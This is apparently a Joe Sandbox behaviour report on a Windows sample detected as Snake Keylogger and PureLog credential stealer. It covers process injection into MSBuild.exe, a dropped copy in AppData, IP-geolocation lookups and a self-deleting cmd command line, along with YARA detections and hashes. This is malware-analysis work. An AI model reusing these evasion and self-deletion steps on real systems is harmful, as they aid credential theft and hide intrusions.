2024-04-11 09:33:35 UTC	709	IN	HTTP/1.1 200 OK Date: Thu, 11 Apr 2024 09:33:35 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 13 Last-Modified: Thu, 11 Apr 2024 09:33:21 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jB4%2BTJ1f2F98y4c2XptDwaIDRr%2BlJbmmpADZVSo4jxQr9O%2BKQ8YnhYtvCK4y6Px05RjepJHUhLa%2FWeBx6r%2Biu9h9fSR%2BV91Lpf4CglgVZGeN5cF0QdKOyG2VBVPDQ5sll9sXkLkL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8729f9d5bb54426b-EWR alt-svc: h3=":443"; ma=86400
2024-04-11 09:33:35 UTC	343	IN	Data Raw: 31 35 30 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 36 2e 31 34 36 2e 33 36 2e 31 39 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 Data Ascii: 150<Response><IP>156.146.36.197</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37
2024-04-11 09:33:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49748	172.67.177.134	443	5640	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-11 09:33:39 UTC	87	OUT	GET /xml/156.146.36.197 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-04-11 09:33:40 UTC	711	IN	HTTP/1.1 200 OK Date: Thu, 11 Apr 2024 09:33:40 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 19 Last-Modified: Thu, 11 Apr 2024 09:33:21 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=opZO7FTLb2%2FrXqD1RRJ%2FrxwVCjI%2FDrWv4mH%2F19zpbu7YJE40%2F8MtnXXZ6q4%2BngmAqy%2F9QAJipK0hn9pBnTTy0JxdlEhVcaH2XdNJXGZDknGU4VsySSXrxCvjlOhx04JJMcxvUAD3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8729f9f56eb67c9f-EWR alt-svc: h3=":443"; ma=86400
2024-04-11 09:33:40 UTC	343	IN	Data Raw: 31 35 30 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 36 2e 31 34 36 2e 33 36 2e 31 39 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 Data Ascii: 150<Response><IP>156.146.36.197</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37
2024-04-11 09:33:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49750	172.67.177.134	443	5408	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-11 09:33:46 UTC	87	OUT	GET /xml/156.146.36.197 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-04-11 09:33:47 UTC	711	IN	HTTP/1.1 200 OK Date: Thu, 11 Apr 2024 09:33:47 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 26 Last-Modified: Thu, 11 Apr 2024 09:33:21 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OC%2B7CDip1dTpJmNjwCFPoDQ24xz5MRC5n6MVrejZRUI1gvMlFXJivk5yK4FYEhq%2FKOP%2B6mfd0IH%2Fy%2FQNjFIG0Yts3tqeyTHv6x1RGv%2BFeFajYyDw455VLL1ZIOvOU43kiDdjbE%2F8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8729fa21ba23195d-EWR alt-svc: h3=":443"; ma=86400
2024-04-11 09:33:47 UTC	343	IN	Data Raw: 31 35 30 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 36 2e 31 34 36 2e 33 36 2e 31 39 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 Data Ascii: 150<Response><IP>156.146.36.197</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37
2024-04-11 09:33:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49752	172.67.177.134	443	5640	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-11 09:33:48 UTC	87	OUT	GET /xml/156.146.36.197 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-04-11 09:33:49 UTC	713	IN	HTTP/1.1 200 OK Date: Thu, 11 Apr 2024 09:33:49 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 28 Last-Modified: Thu, 11 Apr 2024 09:33:21 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KyNt8%2FX69B%2B0fn572vz15qZe%2ByT2nMVYCn3oLzr0kom8zr4EToZWoCZybgH2POpA2FZWVsYQXRqRBsAWaEILlVuFJa9JtORw8%2BwZm0lU%2FDOSktDnJICFtDD%2FbN3VA4drc0%2FH57t%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8729fa2de8a18c6c-EWR alt-svc: h3=":443"; ma=86400
2024-04-11 09:33:49 UTC	343	IN	Data Raw: 31 35 30 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 36 2e 31 34 36 2e 33 36 2e 31 39 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 Data Ascii: 150<Response><IP>156.146.36.197</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37
2024-04-11 09:33:49 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49753	172.67.177.134	443	5408	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-11 09:33:57 UTC	63	OUT	GET /xml/156.146.36.197 HTTP/1.1 Host: reallyfreegeoip.org
2024-04-11 09:33:57 UTC	699	IN	HTTP/1.1 200 OK Date: Thu, 11 Apr 2024 09:33:57 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 36 Last-Modified: Thu, 11 Apr 2024 09:33:21 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sDLDEIQxQHJI2oUqbHniWcVBGonpew4M2OANr1amBp3O4Qe14gDrcd3WHowk0hJIEYowqTw9QxUR9pFJQY41U8vPx6h5TUy2pwGU6Aa2fTIu5dQRa%2FBEQ678ohMrEIGKR79OXl35"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8729fa62bb1d334e-EWR alt-svc: h3=":443"; ma=86400
2024-04-11 09:33:57 UTC	343	IN	Data Raw: 31 35 30 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 36 2e 31 34 36 2e 33 36 2e 31 39 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 Data Ascii: 150<Response><IP>156.146.36.197</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37
2024-04-11 09:33:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	11:31:59
Start date:	11/04/2024
Path:	C:\Users\user\Desktop\Pnihosiyvr.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Pnihosiyvr.exe"
Imagebase:	0x1a32af40000
File size:	209'408 bytes
MD5 hash:	99C80808C736D6FD95EA79E6BFE081B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2332481252.000001A34568A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2332481252.000001A34568A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2332481252.000001A34568A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2332481252.000001A34568A000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.2326053740.000001A32CC01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2325981322.000001A32CB00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2326053740.000001A32CF85000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2326053740.000001A32CF85000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2326053740.000001A32CF85000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2327536841.000001A33D6EA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2333090134.000001A3456F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2327536841.000001A33D91A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2327536841.000001A33D91A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2327536841.000001A33D91A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2327536841.000001A33D91A000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2326053740.000001A32CC78000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2327536841.000001A33CFF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	11:32:34
Start date:	11/04/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
Imagebase:	0x2592a0a0000
File size:	258'544 bytes
MD5 hash:	2EDD0B288FE2459DA84E4274D1942343
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2517166281.0000000140002000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.2517166281.0000000140002000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.2517166281.0000000140002000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000003.00000002.2517166281.0000000140002000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.2519177655.000002592BEA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	11:32:36
Start date:	11/04/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 2128 -s 1412
Imagebase:	0x7ff743c70000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	11:32:44
Start date:	11/04/2024
Path:	C:\Users\user\AppData\Roaming\sssssssssssssssss.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\sssssssssssssssss.exe"
Imagebase:	0x1d296a60000
File size:	209'408 bytes
MD5 hash:	99C80808C736D6FD95EA79E6BFE081B1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2781011462.000001D2B1430000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.2781011462.000001D2B1430000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.2781011462.000001D2B1430000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000008.00000002.2781011462.000001D2B1430000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2769148817.000001D298BAB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.2769148817.000001D298BAB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000008.00000002.2769148817.000001D298BAB000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000008.00000002.2769148817.000001D298B45000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000008.00000002.2774836682.000001D2A9703000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2774836682.000001D2A9582000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.2774836682.000001D2A9582000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.2774836682.000001D2A9582000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000008.00000002.2774836682.000001D2A9582000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000008.00000002.2769148817.000001D298AE8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000008.00000002.2774836682.000001D2A98B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000008.00000002.2769148817.000001D2987F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 39%, ReversingLabs Detection: 56%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	11:32:54
Start date:	11/04/2024
Path:	C:\Users\user\AppData\Roaming\sssssssssssssssss.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\sssssssssssssssss.exe"
Imagebase:	0x20af5040000
File size:	209'408 bytes
MD5 hash:	99C80808C736D6FD95EA79E6BFE081B1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2862679952.0000020A90DE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000B.00000002.2862679952.0000020A90DE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000B.00000002.2862679952.0000020A90DE1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000B.00000002.2862679952.0000020A90DE1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2853021181.0000020A80380000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000B.00000002.2853021181.0000020A80380000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000B.00000002.2853021181.0000020A80380000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000B.00000002.2853021181.0000020A80001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000B.00000002.2853021181.0000020A80078000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	11:33:18
Start date:	11/04/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
Imagebase:	0x18355bb0000
File size:	258'544 bytes
MD5 hash:	2EDD0B288FE2459DA84E4274D1942343
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000C.00000002.3064626577.0000018357C03000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000C.00000002.3064626577.00000183579D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	11:33:27
Start date:	11/04/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
Imagebase:	0x161f9660000
File size:	258'544 bytes
MD5 hash:	2EDD0B288FE2459DA84E4274D1942343
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000D.00000002.3229739212.0000016180001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	11:33:48
Start date:	11/04/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
Imagebase:	0x7ff761fb0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	11:33:48
Start date:	11/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	11:33:48
Start date:	11/04/2024
Path:	C:\Windows\System32\choice.exe
Wow64 process (32bit):	false
Commandline:	choice /C Y /N /D Y /T 3
Imagebase:	0x7ff6583e0000
File size:	35'840 bytes
MD5 hash:	1A9804F0C374283B094E9E55DC5EE128
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Function 00007FF848F42E70 Relevance: 1.3, Instructions: 1335COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2334785734.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_Pnihosiyvr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 227aa783d5cd72e0ef9be4697cd2ff5da75c9b6c440c9f1d241271ddfd8d89bf
Instruction ID: c69c35dcfa83b44a0cfdb5d756fca09c82e55adb4501c67e888e8b64a2e923eb
Opcode Fuzzy Hash: 227aa783d5cd72e0ef9be4697cd2ff5da75c9b6c440c9f1d241271ddfd8d89bf
Instruction Fuzzy Hash: 79C283745186198FD30AEF28C054BA57BB2FB99748F7085AEC01A9B7D5CB37B842CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F475D3 Relevance: .4, Instructions: 407COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2334785734.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_Pnihosiyvr.jbxd

Similarity

API ID:
String ID:
API String ID:
